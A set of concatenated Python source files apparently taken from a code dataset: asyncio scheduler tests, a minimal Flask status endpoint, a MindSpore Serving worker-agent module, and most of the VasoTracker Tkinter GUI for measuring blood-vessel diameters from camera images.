assert abs(diff) < timedelta(milliseconds=1)
def test_asyncio_threadsafe_schedule_now_units(self):
loop = asyncio.get_event_loop()
scheduler = AsyncIOThreadSafeScheduler(loop)
diff = scheduler.now
yield from asyncio.sleep(0.1, loop=loop)
diff = scheduler.now - diff
assert timedelta(milliseconds=80) < diff < timedelta(milliseconds=180)
def test_asyncio_threadsafe_schedule_action(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOThreadSafeScheduler(loop)
ran = False
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
scheduler.schedule(action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.1, loop=loop)
assert ran is True
loop.run_until_complete(go())
def test_asyncio_threadsafe_schedule_action_due(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOThreadSafeScheduler(loop)
starttime = loop.time()
endtime = None
def action(scheduler, state):
nonlocal endtime
endtime = loop.time()
def schedule():
scheduler.schedule_relative(0.2, action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3, loop=loop)
assert endtime is not None
diff = endtime - starttime
assert diff > 0.18
loop.run_until_complete(go())
def test_asyncio_threadsafe_schedule_action_cancel(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
ran = False
scheduler = AsyncIOThreadSafeScheduler(loop)
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
d = scheduler.schedule_relative(0.05, action)
d.dispose()
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3, loop=loop)
assert ran is False
loop.run_until_complete(go())
|
app.py
|
from flask import Flask, request, jsonify
app = Flask(__name__)
def success(msg):
return jsonify({"code": 200, "msg": msg})
def data(json_data):
return jsonify({"code": 200, "data": json_data})
def error(msg):
return jsonify({"code": 500, "msg": msg})
@app.route('/', methods=['GET'])
def get_status():
"""get the node status and return data"""
return data({})
def run_server():
from threading import Thread
thread = Thread(target=app.run, kwargs={'port': 5000, 'host': '0.0.0.0'})
thread.start()
|
worker_agent.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Serving, distributed worker agent"""
import os
import threading
from mindspore_serving._mindspore_serving import WorkerAgent_, AgentStartUpConfig_, ExitSignalHandle_
from mindspore_serving import log as logger
from mindspore_serving.server.worker import init_mindspore
def start_worker_agent(start_config, dec_key, dec_mode):
"""Start up one worker agent on one device id, invoke by agent_startup.startup_worker_agents
"""
if not isinstance(start_config, AgentStartUpConfig_):
raise RuntimeError("Parameter 'start_config' should be instance of AgentStartUpConfig_")
logger.info(f"rank_id={start_config.rank_id}, device_id={start_config.device_id}, "
f"model_file='{start_config.model_file_names}', group_file='{start_config.group_file_names}', "
f"rank_table_file='{start_config.rank_table_json_file_name}',"
f"agent_address='{start_config.agent_address}', "
f"distributed_address='{start_config.distributed_address}'"
f"with_batch_dim={start_config.common_meta.with_batch_dim}, "
f"without_batch_dim_inputs={start_config.common_meta.without_batch_dim_inputs}")
ExitSignalHandle_.start() # Set flag to running and receive Ctrl+C message
init_mindspore.init_mindspore_cxx_env()
os.environ["RANK_ID"] = str(start_config.rank_id)
os.environ["DEVICE_ID"] = str(start_config.device_id)
os.environ["MS_ENABLE_HCCL"] = "1"
if start_config.group_file_names:
os.environ["PARA_GROUP_FILE"] = ';'.join(start_config.group_file_names)
os.environ["RANK_TABLE_FILE"] = start_config.rank_table_json_file_name
for item in ("RANK_ID", "DEVICE_ID", "MS_ENABLE_HCCL", "PARA_GROUP_FILE", "RANK_TABLE_FILE",
"LD_LIBRARY_PATH", "PYTHONPATH"):
logger.info(f"Env {item}: {os.getenv(item, None)}")
if dec_key is None:
dec_key = ''
WorkerAgent_.start_agent(start_config, dec_key, dec_mode)
start_wait_and_clear()
_wait_and_clear_thread = None
def start_wait_and_clear():
"""Waiting for Ctrl+C, and clear up environment"""
def thread_func():
logger.info("Serving worker Agent: wait for Ctrl+C to exit ------------------------------------")
print("Serving worker Agent: wait for Ctrl+C to exit ------------------------------------")
WorkerAgent_.wait_and_clear()
logger.info("Serving worker Agent: exited ------------------------------------")
print("Serving worker Agent: exited ------------------------------------")
global _wait_and_clear_thread
if not _wait_and_clear_thread:
_wait_and_clear_thread = threading.Thread(target=thread_func)
_wait_and_clear_thread.start()
def stop():
r"""
Stop the running of agent.
"""
WorkerAgent_.stop_and_clear()
|
VasoTracker.py
|
##################################################
## VasoTracker Pressure Myograph Software
##
## This software provides diameter measurements (inner and outer) of pressurised blood vessels
## Designed to work with Thorlabs DCC1545M
## For additional info see www.vasostracker.com and https://github.com/kaelome/VasoTracker
##
##################################################
##
## BSD 3-Clause License
##
## Copyright (c) 2018, VasoTracker
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## ## * Redistributions of source code must retain the above copyright notice, this
## list of conditions and the following disclaimer.
##
## * Redistributions in binary form must reproduce the above copyright notice,
## this list of conditions and the following disclaimer in the documentation
## and/or other materials provided with the distribution.
##
## * Neither the name of the copyright holder nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
## DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
## FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
## DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
## SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
## CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
## OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
##################################################
##
## Author: Penelope F Lawton, Matthew D Lee, and Calum Wilson
## Copyright: Copyright 2018, VasoTracker
## Credits: Penelope F Lawton, Matthew D Lee, and Calum Wilson
## License: BSD 3-Clause License
## Version: 1.0.0
## Maintainer: Calum Wilson
## Email: c.wilson.strath@gmail.com
## Status: Production
##
##################################################
## We found the following to be useful:
## https://www.safaribooksonline.com/library/view/python-cookbook/0596001673/ch09s07.html
## http://code.activestate.com/recipes/82965-threads-tkinter-and-asynchronous-io/
## https://www.physics.utoronto.ca/~phy326/python/Live_Plot.py
from __future__ import division
# Tkinter imports
import Tkinter as tk
from Tkinter import *
import tkSimpleDialog
import tkMessageBox as tmb
import tkFileDialog
import ttk
from PIL import Image, ImageTk #convert cv2 image to tkinter
E = tk.E
W = tk.W
N = tk.N
S = tk.S
ypadding = 1.5 #ypadding just to save time - used for both x and y
# Other imports
import os
import time
import datetime
import threading
import random
import Queue
import numpy as np
import cv2
import csv
from skimage import io
import skimage
from skimage import measure
# Import Vasotracker functions
import VTutils
# Add MicroManager to path
import sys
MM_PATH = os.path.join('C:', os.path.sep, 'Program Files','Micro-Manager-1.4')
sys.path.append(MM_PATH)
os.environ['PATH'] = MM_PATH + ';' + os.environ['PATH']
import MMCorePy
'''
import sys
sys.path.append('C:\Program Files\Micro-Manager-1.4')
import MMCorePy
'''
# Import matplotlib
import matplotlib
#matplotlib.use('Qt5Agg')
#matplotlib.use('Qt4Agg', warn=True)
import matplotlib.backends.tkagg as tkagg
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
import matplotlib.pyplot as plt
from matplotlib.backends import backend_qt4agg
from matplotlib import pyplot
class GuiPart(tk.Frame):
#Initialisation function
def __init__(self, master, queue, endCommand, *args, **kwargs):
tk.Frame.__init__(self, *args, **kwargs)
self.queue = queue
self.endApplication = endCommand
#Set up the GUI
self.grid(sticky=N+S+E+W)
top = self.winfo_toplevel()
top.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self.columnconfigure(0, weight=1)
self.filename = self.get_file_name()
self.multiplication_factor = self.get_scale()
self.initUI(endCommand)
# Open the csv file and then clear it
f = open(self.filename.name, "w+")
f.close()
# Add the headers
with open((self.filename.name), 'ab') as f:
w=csv.writer(f, quoting=csv.QUOTE_ALL)
w.writerow(("Time","Outer Diameter", "Inner Diameter"))
# Add file for table
#head,tail = os.path.split(self.filename.name)
self.txt_file = os.path.splitext(self.filename.name)[0]
print "tail = ", self.txt_file
self.txt_file = self.txt_file + ' - Table' + '.csv'
g = open(self.txt_file, "w+")
g.close()
with open((self.txt_file), 'ab') as g:
v=csv.writer(g, quoting=csv.QUOTE_ALL)
column_headings = 'Time (s)', 'Label', 'Diameter', 'Pressure 1 (mmHg)', 'Pressure 2 (mmHg)'
v.writerow(column_headings)
# Function for getting the save file.
def get_file_name(self):
tmb.showinfo("", "Create a file to save output...")
now = datetime.datetime.now()
savename = now.strftime("%Y%m%d")
f = tkFileDialog.asksaveasfile(mode='w', defaultextension=".csv", initialdir="Results\\", initialfile=savename)
if f:
return(f)
else: # asksaveasfile return `None` if dialog closed with "cancel".
if tmb.askquestion("No save file selected", "Do you want to quit VasoTracker?", icon='warning'):
self.endApplication()
else:
f = self.get_file_name()
# Function for getting the save file.
def get_scale(self):
scale = tkSimpleDialog.askfloat("Input", "How many um per pixel?")
if scale is None:
scale = 1
return(scale)
# Function for writing to the save file
def writeToFile(self,data):
with open((self.filename.name), 'ab') as f:
w=csv.writer(f, quoting=csv.QUOTE_ALL)
w.writerow(data)
# Function for closing down
def close_app(self):
if tmb.askokcancel("Close", "Are you sure...?"):
self.endApplication()
# Function for defining an average checkbox ## Shouldbe in toolbar!
def average_checkbox(self, window, text):
avg_checkbox = ttk.Checkbutton(window, text=text)
avg_checkbox.grid(row=0, columnspan=4, padx=3, pady=3)
# Second Function for initialising the GUI
def initUI(self,endCommand):
# make Esc exit the program
root.bind('<Escape>', lambda e: endCommand)
# make the top right close button minimize (iconify) the main window
root.protocol("WM_DELETE_WINDOW", self.close_app)
# create a menu bar with an Exit command
menubar = tk.Menu(root)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label="Exit", command=self.close_app)
menubar.add_cascade(label="File", menu=filemenu)
root.config(menu=menubar)
self.pack(fill=BOTH, expand=1)
# Make the toolbar along the top
self.toolbar = ToolBar(self)#ttk.Frame(root, height=150)
self.toolbar.grid(row=0, column=0,rowspan=1,columnspan=3, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
# Make the status bar along the bottom
self.status_bar = ttk.Label(text = 'Thank you for using VasoTracker.', relief=SUNKEN, anchor='w')
self.status_bar.pack(side=BOTTOM, fill=X)
# Make the graph frame
self.graphframe = GraphFrame(self)
self.graphframe.grid(row=1, column=0, rowspan=3, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
# Make the table frame
self.tableframe = TableFrame(self)
self.tableframe.grid(row=1, column=2, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
# Make the Camera Frame bottom right
self.cameraframe = CameraFrame(self)
self.cameraframe.grid(row=2, column=2, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
if self.toolbar.start_flag:
mmc.startContinuousSequenceAcquisition(500)
# Count function for reading in with FakeCamera
self.count = 0
# This function will process all of the incoming images
def processIncoming(self, outers, inners, timelist):
"""Handle all messages currently in the queue, if any."""
while self.queue.qsize( ):
print "Queue size = ", self.queue.qsize( )
try:
if self.toolbar.record_flag:
if self.count == 0:
global start_time
start_time=time.time()
# This is for loading in a video as an example!
try:
mmc.setProperty('Focus', "Position", self.count)
except:
pass
#Get the image
msg = self.queue.get(0)
# Check contents of message and do whatever is needed. As a simple test, print it (in real life, you would suitably update the GUI's display in a richer fashion).
#Get the time
timenow = time.time() - start_time
print "Checkbox Status = ", self.toolbar.record_is_checked.get()
if self.toolbar.record_is_checked.get() == 1 and self.count%60 == 0:
print head
print tail
timenow2 = int(timenow)
gfxPath = os.path.join(head, '%s_t=%ss.tiff' % (os.path.splitext(tail)[0],timenow2))
skimage.io.imsave(gfxPath, msg)
#print msg
self.calculate_diameter = Calculate_Diameter(self,self.multiplication_factor)
global OD
global ID
outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,ID,start = self.calculate_diameter.calc(msg, self.multiplication_factor)
if self.count == 0:
global initOD, initID
initOD = OD
initID = ID
params = timenow,outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,start
savedata = timenow,OD,ID
self.writeToFile(savedata)
self.cameraframe.process_queue(params,msg)
timelist.append(timenow)
#print timelist
outers.append(OD)
inners.append(ID)
self.graphframe.plot(timelist,outers,inners,self.toolbar.xlims, self.toolbar.ylims, self.toolbar.xlims2, self.toolbar.ylims2)
self.count += 1
else:
msg = self.queue.get(0)
params = 0,0,0,0,0,0,0
self.cameraframe.process_queue(params,msg)
print self.count
return
except Queue.Empty:
# just on general principles, although we don't expect this branch to be taken in this case
pass
return
class setCamera(object):
def __init__(self,camera_label):
camera_label = camera_label
#print "working out the diameter"
def set(self, camera_label):
mmc.reset()
if camera_label == "Thorlabs":
print "Camera Selected: ", camera_label
DEVICE = ["ThorCam","ThorlabsUSBCamera","ThorCam"] #camera properties - micromanager creates these in a file
elif camera_label == "FakeCamera":
print "Camera Selected: ", camera_label
DEVICE = ['Camera', 'FakeCamera', 'FakeCamera'] #camera properties - micromanager creates these in a file
elif camera_label == "":
tmb.showinfo("Warning", "You need to select a camera source!")
return
# Set up the camera
mmc.enableStderrLog(False)
mmc.enableDebugLog(False)
mmc.setCircularBufferMemoryFootprint(100)# (in case of memory problems)
mmc.loadDevice(*DEVICE)
mmc.initializeDevice(DEVICE[0])
mmc.setCameraDevice(DEVICE[0])
mmc.setExposure(500)
mmc.setProperty(DEVICE[0], 'PixelType', '8bit')
mmc.setProperty(DEVICE[0], 'Path mask', 'SampleData\\TEST?{4.0}?.tif') #C:\\00-Code\\00 - VasoTracker\\
# To load in a sequence
DEVICE2 = ['Focus', 'DemoCamera', 'DStage']
mmc.loadDevice(*DEVICE2)
mmc.initializeDevice(DEVICE2[0])
mmc.setFocusDevice(DEVICE2[0])
#mmc.snapImage()
#img = mmc.getImage()
#mmc.setProperty("DStage", "Position", 100);
mmc.setProperty(self.DEVICE2[0], "Position", 0)
# Class for the main toolbar
class ToolBar(tk.Frame):
def __init__(self,parent):
tk.Frame.__init__(self, parent, height = 150)#, width=250, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.mainWidgets()
self.set_camera = setCamera(self)
def mainWidgets(self):
self.toolbarview = ttk.Frame(root, relief=RIDGE)
#self.toolbarview.pack(side=LEFT, fill=BOTH, expand=1)
self.toolbarview.grid(row=2,column=2,rowspan=2,sticky=N+S+E+W, pady=ypadding)
# Tool bar groups
source_group = ttk.LabelFrame(self, text='Source', height=150, width=200)
source_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
outer_diameter_group = ttk.LabelFrame(self, text='Outer Diameter', height=150, width=200)
outer_diameter_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
inner_diameter_group = ttk.LabelFrame(self, text='Inner Diameter', height=150, width=200)
inner_diameter_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
acquisition_group = ttk.LabelFrame(self, text='Data acquisition', height=150, width=200)
acquisition_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
start_group = ttk.LabelFrame(self, text='Start/Stop', height=150, width=200)
start_group.pack(side=LEFT, anchor=N, padx=3, fill=Y)
# Source group (e.g. camera and files)
camera_label = ttk.Label(source_group, text = 'Camera:')
camera_label.grid(row=0, column=0, sticky=E)
path_label = ttk.Label(source_group, text = 'Path:')
path_label.grid(row=1, column=0, sticky=E)
save_label = ttk.Label(source_group, text = 'File:')
save_label.grid(row=2, column=0, sticky=E)
# Flag Start/stop group
self.start_flag = False
def set_cam(self):
if self.start_flag == False:
camera_label = variable.get()
self.set_camera.set(camera_label)
return
else:
print "You can't change the camera whilst acquiring images!"
return
self.camoptions = ["...","Thorlabs","FakeCamera"]
variable = StringVar()
variable.set(self.camoptions[0])
self.camera_entry = ttk.OptionMenu(source_group, variable,self.camoptions[0], *self.camoptions, command= lambda _: set_cam(self))
#camera_entry = ttk.Entry(source_group, width=20)
#camera_entry.insert('0', DEVICE[1])
#camera_entry.config(state=DISABLED)
self.camera_entry.grid(row=0, column=1, pady=5)
global head
global tail
head,tail = os.path.split(self.parent.filename.name)
path_entry = ttk.Entry(source_group, width=20)
path_entry.insert(0, head)
path_entry.config(state=DISABLED)
path_entry.grid(row=1, column=1, pady=5)
save_entry = ttk.Entry(source_group, width=20)
save_entry.insert(0, tail)
save_entry.config(state=DISABLED)
save_entry.grid(row=2, column=1, pady=5)
scale_label = ttk.Label(source_group, text = 'um/pixel:')
scale_label.grid(row=3, column=0, sticky=E)
scale_entry = ttk.Entry(source_group, width=20)
scale = self.parent.multiplication_factor
scalefloat = "%4.2f" % scale
scale_entry.insert('0', scalefloat)
scale_entry.config(state=DISABLED)
scale_entry.grid(row=3, column=1, pady=5)
# Outer diameter group
# Function for the labels
def coord_label(window, text, row, column):
label=ttk.Label(window, text=text)
label.grid(row=row, column=column, padx = 1, sticky=E)
# Function for the labels 2
def coord_entry(window, row, column, coord_label):
entry = ttk.Entry(window, width=8, textvariable=coord_label)
entry.config(state=NORMAL)
entry.grid(row=row, column=column, padx=1, sticky=E)
root.focus_set()
entry.focus_set()
root.focus_force()
return entry
def set_button(window):
set_button = ttk.Button(window, text='Set', command= lambda: coord_limits(get_coords=True, default = False))
set_button.grid(row=3, columnspan=4, pady=5)
def set_button_function(get_coords):
if get_coords == True:
self.coord_limits()
if get_coords == False:
pass
def coord_limits(get_coords, default):
if get_coords == True:
if default:
self.xlims = (self.x_min_default, self.x_max_default)
self.ylims = (self.y_min_default, self.y_max_default)
outer_xmin_entry.delete(0, END), outer_xmax_entry.delete(0, END)
outer_xmin_entry.insert('0', self.x_min_default), outer_xmax_entry.insert('0', self.x_max_default)
outer_ymin_entry.delete(0, END), outer_ymax_entry.delete(0, END)
outer_ymin_entry.insert('0', self.y_min_default), outer_ymax_entry.insert('0', self.y_max_default)
else:
self.xlims = (self.x_min_label.get(),self.x_max_label.get())
self.ylims = (self.y_min_label.get(),self.y_max_label.get())
print "XLIMS_TRUE_SET = ", self.xlims
return self.xlims, self.ylims
get_coords = False
else:
pass
# Set the initial xlimit values
self.x_min_label, self.x_max_label = IntVar(value=-600), IntVar(value=0)
self.x_min_default, self.x_max_default = self.x_min_label.get(),self.x_max_label.get()
# Set the initial xlimit values
self.y_min_label, self.y_max_label = IntVar(value=100), IntVar(value=250)
self.y_min_default, self.y_max_default = self.y_min_label.get(),self.y_max_label.get()
# Get the x and y limits
self.xlims = (self.x_min_label.get(),self.x_max_label.get())
self.ylims = (self.y_min_label.get(),self.y_max_label.get())
outer_xmin_label = coord_label(outer_diameter_group, 'X-Min:', 1, 0)
outer_xmax_label = coord_label(outer_diameter_group, 'X-Max:', 2, 0)
outer_ymin_label = coord_label(outer_diameter_group, 'Y-Min:', 1, 2)
outer_ymax_label = coord_label(outer_diameter_group, 'Y-Max:', 2, 2)
outer_xmin_entry = coord_entry(outer_diameter_group, 1, 1, self.x_min_label)
outer_xmax_entry = coord_entry(outer_diameter_group, 2, 1, self.x_max_label)
outer_ymin_entry = coord_entry(outer_diameter_group, 1, 3, self.y_min_label)
outer_ymax_entry = coord_entry(outer_diameter_group, 2, 3, self.y_max_label)
outer_set_button = set_button(outer_diameter_group)
# Button to set the axis limits to the default values
set_button = ttk.Button(outer_diameter_group, text='Default', command= lambda: coord_limits(get_coords=True, default = True))
set_button.grid(row=4, columnspan=4, pady=5)
#********** Inner Diameter Group **********
def set_button2(window):
set_button = ttk.Button(window, text='Set', command= lambda: coord_limits2(get_coords=True, default = False))
set_button.grid(row=3, columnspan=4, pady=5)
def set_button_function(get_coords):
if get_coords == True:
self.coord_limits2()
if get_coords == False:
pass
def coord_limits2(get_coords, default):
if get_coords == True:
if default:
self.xlims2 = (self.x_min_default2, self.x_max_default2)
self.ylims2 = (self.y_min_default2, self.y_max_default2)
inner_xmin_entry.delete(0, END), inner_xmax_entry.delete(0, END)
inner_xmin_entry.insert('0', self.x_min_default2), inner_xmax_entry.insert('0', self.x_max_default2)
inner_ymin_entry.delete(0, END), inner_ymax_entry.delete(0, END)
inner_ymin_entry.insert('0', self.y_min_default2), inner_ymax_entry.insert('0', self.y_max_default2)
else:
self.xlims2 = (self.x_min_label2.get(),self.x_max_label2.get())
self.ylims2 = (self.y_min_label2.get(),self.y_max_label2.get())
print "Inner XLIMS_TRUE_SET = ", self.xlims2
return self.xlims2, self.ylims2
get_coords = False
else:
pass
# Set the initial xlimit values
self.x_min_label2, self.x_max_label2 = IntVar(value=-600), IntVar(value=0)
self.x_min_default2, self.x_max_default2 = self.x_min_label2.get(),self.x_max_label2.get()
# Set the initial xlimit values
self.y_min_label2, self.y_max_label2 = IntVar(value=50), IntVar(value=200)
self.y_min_default2, self.y_max_default2 = self.y_min_label2.get(),self.y_max_label2.get()
# Get the x and y limits
self.xlims2 = (self.x_min_label2.get(),self.x_max_label2.get())
self.ylims2 = (self.y_min_label2.get(),self.y_max_label2.get())
inner_xmin_label = coord_label(inner_diameter_group, 'X-Min:', 1, 0)
inner_xmax_label = coord_label(inner_diameter_group, 'X-Max:', 2, 0)
inner_ymin_label = coord_label(inner_diameter_group, 'Y-Min:', 1, 2)
inner_ymax_label = coord_label(inner_diameter_group, 'Y-Max:', 2, 2)
inner_xmin_entry = coord_entry(inner_diameter_group, 1, 1, self.x_min_label2)
inner_xmax_entry = coord_entry(inner_diameter_group, 2, 1, self.x_max_label2)
inner_ymin_entry = coord_entry(inner_diameter_group, 1, 3, self.y_min_label2)
inner_ymax_entry = coord_entry(inner_diameter_group, 2, 3, self.y_max_label2)
inner_set_button = set_button2(inner_diameter_group)
# Button to set the axis limits to the default values
set_button = ttk.Button(inner_diameter_group, text='Default', command= lambda: coord_limits2(get_coords=True, default = True))
set_button.grid(row=4, columnspan=4, pady=5)
# acquisition_group
def coord_label(window, text, row, column):
label=ttk.Label(window, text=text)
label.grid(row=row, column=column, padx = 1, sticky=E)
temp_label = ttk.Label(acquisition_group, text = 'Temp (oC):')
temp_label.grid(row=0, column=0, sticky=E)
pressure_label = ttk.Label(acquisition_group, text = 'Pressure (mmHg):')
pressure_label.grid(row=1, column=0, sticky=E)
temp_entry = ttk.Entry(acquisition_group, width=20)
temp_entry.insert(0, "37")
temp_entry.config(state=DISABLED)
temp_entry.grid(row=0, column=1, pady=5)
pressure_entry = ttk.Entry(acquisition_group, width=20)
pressure_entry.insert(0, "60")
pressure_entry.config(state=DISABLED)
pressure_entry.grid(row=1, column=1, pady=5)
# Function that will start the image acquisition
def start_acq():
if variable.get() == "...":
tmb.showwarning(title="Warning", message = "You need to select a camera source!")
self.start_flag = False
else:
self.camera_entry.configure(state="disabled")
print self.start_flag
self.start_flag = True
print self.start_flag
mmc.startContinuousSequenceAcquisition(1000)
return self.start_flag
# Function that will stop the image acquisition
def stop_acq():
self.camera_entry.configure(state="enabled")
print self.start_flag
self.start_flag = False
print self.start_flag
mmc.stopSequenceAcquisition()
return self.start_flag
# Function that will start the data acquisition
self.record_flag = False
def record_data():
self.record_flag = True
print "Just set the record flag to: ", self.record_flag
return self.record_flag
start_button = ttk.Button(start_group, text='Start', command= lambda: start_acq())
start_button.grid(row=0, column=0, pady=5, sticky=N+S+E+W)
#console = tk.Button(master, text='Exit', command=self.close_app)
#console.pack( )
live_button = ttk.Button(start_group, text='Stop', command= lambda: stop_acq())
live_button.grid(row=1, column=0, pady=5, sticky=N+S+E+W)
record_button = ttk.Button(start_group, text='Record', command= lambda: record_data())
record_button.grid(row=3, column=0, pady=5, sticky=N+S+E+W)
self.record_is_checked = IntVar()
record_video_checkBox = ttk.Checkbutton(start_group, text='Record Video', onvalue=1, offvalue=0, variable=self.record_is_checked)
record_video_checkBox.grid(row=4, columnspan=2, padx=5, pady=3, sticky=W)
class GraphFrame(tk.Frame):
min_x = 0
max_x = 10
def __init__(self,parent):
tk.Frame.__init__(self, parent, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.top = Frame()
self.top.update_idletasks()
self.n_points = 100000
self.xlim1 = self.parent.toolbar.x_min_default # Outer
self.xlim2 = self.parent.toolbar.x_max_default # Outer
self.ylim1 = self.parent.toolbar.y_min_default # Outer
self.ylim2 = self.parent.toolbar.y_max_default # Outer
self.xlim3 = self.parent.toolbar.x_min_default2 # Inner
self.xlim4 = self.parent.toolbar.x_max_default2 # Inner
self.ylim3 = self.parent.toolbar.y_min_default2 # Inner
self.ylim4 = self.parent.toolbar.y_max_default2 # Inner
self.delta_i = 1
self.n_data = 100000000
self.update = 1
self.timeit = TimeIt()
self.mainWidgets()
def mainWidgets(self,blit=False):
self.graphview = tk.Label(self)
self.graphview.figure,(self.graphview.ax1,self.graphview.ax2) = plt.subplots(2,1)
#self.graphview.figure = pyplot.figure()
#self.graphview.ax1 = self.graphview.figure.add_subplot(211)
#self.graphview.ax2 = self.graphview.figure.add_subplot(212)
self.graphview.line, = self.graphview.ax1.plot([],[]) # initialize line to be drawn
self.graphview.line2, = self.graphview.ax2.plot([],[])
self.graphview.ax1.set_xlim(self.xlim1,self.xlim2) # Outer
self.graphview.ax2.set_xlim(self.xlim3,self.xlim4) # Inner
self.graphview.ax1.set_ylim(self.ylim1,self.ylim2) # Outer
self.graphview.ax2.set_ylim(self.ylim3,self.ylim4) # Inner
#self.graphview.ax1.set_xlabel('Time (s)', fontsize=14) # Outer diameter labels
self.graphview.ax1.set_ylabel('Outer diameter (um)', fontsize=14) # Outer diameter labels
self.graphview.ax2.set_xlabel('Time (s)', fontsize=14) # Inner diameter labels
self.graphview.ax2.set_ylabel('Lumen diameter (um)', fontsize=14) # Inner diameter labels
self.graphview.figure.canvas.draw()
self.graphview.figure.canvas = FigureCanvasTkAgg(self.graphview.figure, self)
self.graphview.figure.canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
if blit:
# Get the background
self.ax1background = self.graphview.figure.canvas.copy_from_bbox(self.graphview.ax1.bbox)
self.ax2background = self.graphview.figure.canvas.copy_from_bbox(self.graphview.ax2.bbox)
def on_running(self, xdata, ydata1,ydata2,xlims,ylims, xlims2,ylims2,blit=False):
# Set the axis values
self.graphview.ax1.set_xlim(xlims[0],xlims[1]) # Outer diameter
self.graphview.ax1.set_ylim(ylims[0],ylims[1]) # Outer diameter
self.graphview.ax2.set_xlim(xlims2[0],xlims2[1]) # Inner diameter
self.graphview.ax2.set_ylim(ylims2[0],ylims2[1]) # Inner diameter
# Subtract off the latest time point, so that the current time is t = 0
xdata = [el-xdata[-1] for el in xdata]
# Make every 7th point different so we can see when plotting
#ydata1 = [t if k%7 else t-10 for k,t in enumerate(ydata1)]
#ydata2 = [t if k%7 else t-10 for k,t in enumerate(ydata2)]
# Get the xdata points that fit within the axis limits
xdata3 = [el for el in xdata if el > xlims[0]]
# Get the corresponding ydata points
ydata1A = ydata1[::-1]
ydata1B = ydata1A[0:len(xdata3)]
ydata1C = ydata1B[::-1]
ydata2A = ydata2[::-1]
ydata2B = ydata2A[0:len(xdata3)]
ydata2C = ydata2B[::-1]
#ydata1 = [el2 for (el1,el2) in zip(xdata,ydata1) if el1 > self.xlim1-5] # For some reason this did not work
#ydata2 = [el2 for (el1,el2) in zip(xdata,ydata2) if el1 > self.xlim1-5] # For some reason this did not work
# If there are many data points, it is a waste of time to plot all
# of them once the screen resolution is reached,
# so when the maximum number of points is reached,
# halve the number of points plotted. This is repeated
# every time the number of data points has doubled.
self.i = int(len(xdata3))
'''
if self.i == self.n_points :
self.n_points *= 2
# frequency of plotted points
self.delta_i *= self.n_points/self.i
self.update = max(self.delta_i, self.update)
print("updating n_rescale = ",\
self.n_points, self.update, self.delta_i)
'''
# drawing the canvas takes most of the CPU time, so only update plot
# every so often
if blit == False:
if self.i == self.n_data-1 or not (self.i % self.update) :
self.graphview.ax1.lines.remove(self.graphview.line)
self.graphview.ax2.lines.remove(self.graphview.line2)
self.graphview.line, = self.graphview.ax1.plot(
xdata3[::-1][0::int(self.delta_i)][::-1],
ydata1C[::-1][0::int(self.delta_i)][::-1],
color="blue", linewidth = 3)
self.graphview.line2, = self.graphview.ax2.plot(
xdata3[::-1][0::int(self.delta_i)][::-1],
ydata2C[::-1][0::int(self.delta_i)][::-1],
color="red", linewidth = 3)
with self.timeit:
self.graphview.figure.canvas.draw()
self.graphview.figure.canvas.get_tk_widget().update_idletasks()
#self.after(2,self.plotter)
#self.graphview.figure.canvas.flush_events()
if blit == True:
with self.timeit:
self.graphview.figure.canvas.restore_region(self.ax1background)
self.graphview.figure.canvas.restore_region(self.ax2background)
try:
self.graphview.ax1.lines.remove(self.graphview.line)
self.graphview.ax2.lines.remove(self.graphview.line2)
except:
pass
self.graphview.line.set_xdata(xdata3[::-1][0::int(self.delta_i)][::-1])
self.graphview.line.set_ydata(ydata1C[::-1][0::int(self.delta_i)][::-1])
